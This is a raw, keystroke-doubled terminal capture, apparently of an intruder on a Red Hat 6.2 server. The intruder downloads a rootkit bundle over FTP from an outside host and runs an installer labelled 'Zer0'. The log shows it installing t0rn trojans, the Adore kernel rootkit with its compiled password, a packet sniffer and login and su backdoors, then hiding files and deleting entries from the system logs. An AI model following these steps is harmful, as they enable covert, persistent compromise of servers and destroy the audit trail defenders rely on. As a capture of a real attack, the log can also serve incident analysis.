#' '#P ' 38400,38400'XTERM! Red Hat Linux release 6.2 (Zoot) Kernel 2.2.14-5.0 on an i586 !login: nnoobbooddyy Last login: Sun Sep 16 04:32:21 from 217.156.93.166 sh: ulimit: cannot modify limit: Operation not permitted sh-2.03$ ssu ud ndsns ]0;nobody@ns1: /[root@ns1 /]# ww 4:49am up 3 days, 10:57, 1 user, load average: 0.00, 0.00, 0.04 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT nobody pts/0 217.156.93.166 4:49am 0.00s 1.02s ? - ]0;nobody@ns1: /[root@ns1 /]# ccdd cdc d/ /ttmmpp ]0;nobody@ns1: /tmp[root@ns1 /tmp]# mmcc -s- s bash: mc: command not found ]0;nobody@ns1: /tmp[root@ns1 /tmp]# ff ffttpp tteelleeppoorrtt.. cdc d //ddeevv//rrdd ]0;nobody@ns1: /dev/rd[root@ns1 rd]# fffttp pt etleeploreptort.t.ggo.or.oro ]0;nobody@ns1: /dev/rd[root@ns1 rd]# ]0;nobody@ns1: /dev/rd[root@ns1 rd]# ]0;nobody@ns1: /dev/rd[root@ns1 rd]# mmkkddiir rr ssddcc00 ]0;nobody@ns1: /dev/rd[root@ns1 rd]# ccd ds dscd0c 0 ]0;nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# lls s [00m[m]0;nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# [Als[Acd sdc0[A[4hmkd[4lir sdc0[A[Aftp teleport.go.ro Connected to teleport.go.ro. 220- 220- 220- H O M E . R O 220- 220- This server is for HOME.RO members only. 220- Go to http://www.home.ro/ to register. 220- 220- No anonymous access allowed. 220- 220- 220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) [193.231.236.42] Name (teleport.go.ro:nobody): tteellepeporortt 331 Password required for teleport. Password: 230 User teleport logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ccd dn ewn ew 250 CWD command successful. ftp> ggeet et et et Zer0.tar.gzZer0.tar.gz local: Zer0.tar.gz remote: Zer0.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes). 226 Transfer complete. 139711 bytes received in 7.76 secs (18 Kbytes/sec) ftp> bbyy get coget copyp.y.tatrar...ggzz local: copy.tar.gz remote: copy.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes). 226 Transfer complete. 265189 bytes received in 14.6 secs (18 Kbytes/sec) ftp> ggeet to ootoyty..ttaarr..ggzz local: ooty.tar.gz remote: ooty.tar.gz 200 PORT command successful. 150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes). 226 Transfer complete. 14847 bytes received in 0.856 secs (17 Kbytes/sec) ftp> bbyyee 221 Goodbye. ]0;nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# ttaar r zxzxvfvf ZZer0.tar.gz Zer0/ tar: Archive contains future timestamp 2001-09-16 20:26:34 Zer0/Go Zer0/ssh.tgz Zer0/tls.tgz Zer0/adr.tgz Zer0/adr2.tgz tar: Archive contains future timestamp 2001-09-16 20:27:45 Zer0/adore.h ]0;nobody@ns1: /dev/rd/sdc0[root@ns1 sdc0]# ..//ZZer0/[1~[3~[1P[3~[1Pc[4hc[4ld[4hd[4l [4h [4l ]0;nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# llss [00m[01;32mGo[00m [00madore.h[00m [01;31madr.tgz[00m [01;31madr2.tgz[00m [01;31mssh.tgz[00m [01;31mtls.tgz[00m [m]0;nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# ..// ..//GGo 2244 syslogd: no process killed [1;37m====================================================================[0m [1;34m .oooo. oooo o8o . .o8 d8P''Y8b [1;37m [0m[1;34m '888 ''' .o8 .o888oo 888 888 oooo d8b ooo. .oo. 888 oooo oooo .o888oo [0;34m 888 888 888 '888''8P '888P'Y88b 888 .8P' '888 888 888 888 888 888 888 888 888888. 888 888 [1;34m 888 . '88b d88' 888 888 888 888 '88b. 888 888 . '888' 'Y8bd8P' d888b o888o o888o o888o o888o o888o '888'[0m [0;31m Modificat de mine... Viruzzel [0m [1;37m====================================================================[0m [1;34mbackdooring started on [1;37mns1[0m [1;34m# #[0m [1;34m# #[0m [1;31mchecking for remote logging... [0m[1;37mholy guacamole batman[0m ${RED} REMOTE LOGGING DETECTED ${RES} ${WHI} I hope you can get to these other computer(s): ${RES} 000.000.00.000 ${WHI} cuz this computer is LOGGING to it... ${RES} [1;37m--------------------------------------------------------------------[0m [1;34m# [1;34m[Droping files...] [0m [1;37m--------------------------------------------------------------------[0m ]0;nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# exit .t0rn/ .t0rn/shhk .t0rn/shrs .t0rn/shhk.pub .t0rn/shsml .t0rn/sharsed .t0rn/shdcf2 .t0rn/shhash EOT CVS/ CVS/Root CVS/Repository CVS/Entries CVS/Tag Makefile.gen tar: Archive contains future timestamp 2029-09-09 09:05:12 adore.c adore.h ava.c cleaner.c cnfad dummy.c libinvisible.c libinvisible.h pass rename.c stad lgstrip nscd.init patch vrssb vrssnf vrssnk [1;37m--------------------------------------------------------------------[0m [1;34m# [1;34m[Installing trojans...] [0m [1;37m--------------------------------------------------------------------[0m [1;34m# [1;34m Using ssh-port : [1;37m24 [1;34m [0m [1;37m--------------------------------------------------------------------[0m [1;31m[System Information...][0m [1;37m--------------------------------------------------------------------[0m [1;34mHostname :[1;37m ns1 (192.168.1.102)[0m [1;34mArch : [1;37mi586 -+- bogomips : 187.19 '[0m [1;34mAlternative IP :[1;37m 127.0.0.1 -+- Might be [ 1 ] active adapters.[0m [1;34mDistribution:[1;37m Red Hat Linux release 6.2 (Zoot)[0m [1;37m--------------------------------------------------------------------[0m [1;31mipchains ...?[0m [1;37m--------------------------------------------------------------------[0m Chain input (policy ACCEPT): [1;37m--------------------------------------------------------------------[0m [1;34m# [1;34m[Searching for Make, gcc...] [0m [1;37m--------------------------------------------------------------------[0m [1;32mMake found![0m [1;32mgcc found![0m [1;37m--------------------------------------------------------------------[0m [1;34m# [1;34m[Installing adore...] [0m [1;37m--------------------------------------------------------------------[0m Starting adore configuration ... Checking 4 ELITE_UID ... found 30 Checking 4 ELITE_CMD ... using 107613 Checking 4 SMP ... NO Checking 4 MODVERSIONS ... YES Checking for kgcc ... found cc Checking 4 insmod ... found /sbin/insmod -- OK Loaded modules: lockd 31592 1 (autoclean) sunrpc 53540 1 (autoclean) [lockd] pcnet32 10692 1 (autoclean) Since version 0.33 Adore requires 'authentication' for its services. You will be prompted for a password now and this password will be compiled into 'adore' and 'ava' so no further actions by you are required. This procedure will save adore from scanners. Try to choose a unique name that won't clash with normal calls to mkdir(2). Password (echoed):llaabbuuttzzaa Preparing /usr/X11R6/bin/.,/copy/adr (== cwd) for hiding ... Creating Makefile ... *** Edit adore.h for the hidden services and redirected file-access *** cp: Makefile: No such file or directory make: *** Warning: File `adore.c' has modification time in the future (2029-09-09 09:05:12 > 2001-09-16 05:02:21) rm -f adore.o cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS adore.c -o adore.o adore.c:484: warning: `/*' within comment cc -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS ava.c libinvisible.c -o ava cc -I/usr/src/linux/include -c -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS cleaner.c make: *** Warning: Clock skew detected. Your build may be incomplete. [1;32mava found... proceeding![0m [1;32msniffer running![0m Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/usr/X11R6/bin/.,' hided. Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/usr/info/.t0rn' hided. Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/dev/rd/sdc0' hided. Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/dev/rd/nscd.init' hided. Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/etc/rc.d/rc3.d/S50inet' hided. Checking for adore 0.12 or higher ... Adore 0.39 installed. Good luck. File '/usr/X11R6/lib/X11/.~' hided. [1;32mdone hiding...[0m [1;37m--------------------------------------------------------------------[0m [1;34m# [1;34m[hmmm...nothing to worry about, for you, hehehe...] [0m [1;37m--------------------------------------------------------------------[0m [34mUSE this file for testing purposes ONLY ... tested on RH6.2 [36m [32mLogin backdooring started ...[36m [34mStep 1: [36mSetting login parameters ...[60G[32m [ OK ] [36m [34mStep 2: [36mSetting su parameters ...[60G[32m [ OK ] [36m [34mStep 3: [36mCreating config files ...[60G[32m [ OK ] [36m [0m [1;32mDone??!!?hmmm.. who knows... [1;34m:[1;31mP [1;32mI DO! hihihi [1;37m--------------------------------------------------------------------[0m [1;34m# [1;34m[Removing unnecessary files.. cleaning...] [0m [1;37m--------------------------------------------------------------------[0m [1;30m* [1;37msauber [0;37mby [1;37ms[1;34mo[0;34mck[1;30med [[0;37m13[1;30m.[0;37m03[1;30m.[0;37m2k+1[1;30m][0m [1;30m*[0m [1;30m* [0;37mCleaning logs.. This may take a bit depending on the size of the logs.[0m [1;30m* [0;37mCleaning [1;37mboot.log (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mboot.log.1 (133 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mcron (8 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mcron.1 (599 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mdmesg (70 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mhtmlaccess.log (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmaillog (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmaillog.1 (24 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmessages (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmessages.1 (383 [0;37mlines[1;37m)[1;30m...[0m[1;37m6 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mnetconf.log (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37msecure (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37msecure.1 (52 [0;37mlines[1;37m)[1;30m...[0m[1;37m10 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37msendmail.st (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m-1 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mspooler (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mspooler.1 (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mxferlog (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mxferlog.1 (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m syslogd: no process killed [1;30m* [0;37mAlles sauber mein Meister !'Q%&@ [0m [1;30m* [1;37msauber [0;37mby [1;37ms[1;34mo[0;34mck[1;30med [[0;37m13[1;30m.[0;37m03[1;30m.[0;37m2k+1[1;30m][0m [1;30m*[0m [1;30m* [0;37mCleaning logs.. This may take a bit depending on the size of the logs.[0m [1;30m* [0;37mCleaning [1;37mboot.log (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mboot.log.1 (133 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mcron (8 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mcron.1 (599 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mdmesg (70 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mhtmlaccess.log (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmaillog (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmaillog.1 (24 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmessages (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmessages.1 (377 [0;37mlines[1;37m)[1;30m...[0m[1;37m1 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mnetconf.log (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37msecure (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37msecure.1 (42 [0;37mlines[1;37m)[1;30m...[0m[1;37m26 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37msendmail.st (1 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mspooler (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mspooler.1 (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mxferlog (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mxferlog.1 (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m syslogd: no process killed [1;30m* [0;37mAlles sauber mein Meister !'Q%&@ [0m [1;30m* [1;37msauber [0;37mby [1;37ms[1;34mo[0;34mck[1;30med [[0;37m13[1;30m.[0;37m03[1;30m.[0;37m2k+1[1;30m][0m [1;30m*[0m [1;30m* [0;37mCleaning logs.. This may take a bit depending on the size of the logs.[0m [1;30m* [0;37mCleaning [1;37mboot.log (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mboot.log.1 (133 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mcron (8 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mcron.1 (599 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mdmesg (70 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mhtmlaccess.log (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmaillog (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmaillog.1 (24 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmessages (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mmessages.1 (376 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mnetconf.log (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37msecure (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37msecure.1 (16 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37msendmail.st (1 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mspooler (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mspooler.1 (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mxferlog (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m [1;30m* [0;37mCleaning [1;37mxferlog.1 (0 [0;37mlines[1;37m)[1;30m...[0m[1;37m0 [0;37mlines removed![0m syslogd: no process killed [1;30m* [0;37mAlles sauber mein Meister !'Q%&@ [0m [1;37m--------------------------------------------------------------------[0m [1;34m# [1;34m[Linking /bin/.bash_history, adjusting time...] [0m [1;37m--------------------------------------------------------------------[0m [1;37m====================================================================[0m [1;32m HIHIHI.. CICA GATA.. AM TERMINAT!! [0m Zer0... by Viruzzel [1;37m====================================================================[0m ]0;nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 Zer0]# exit sh-2.03$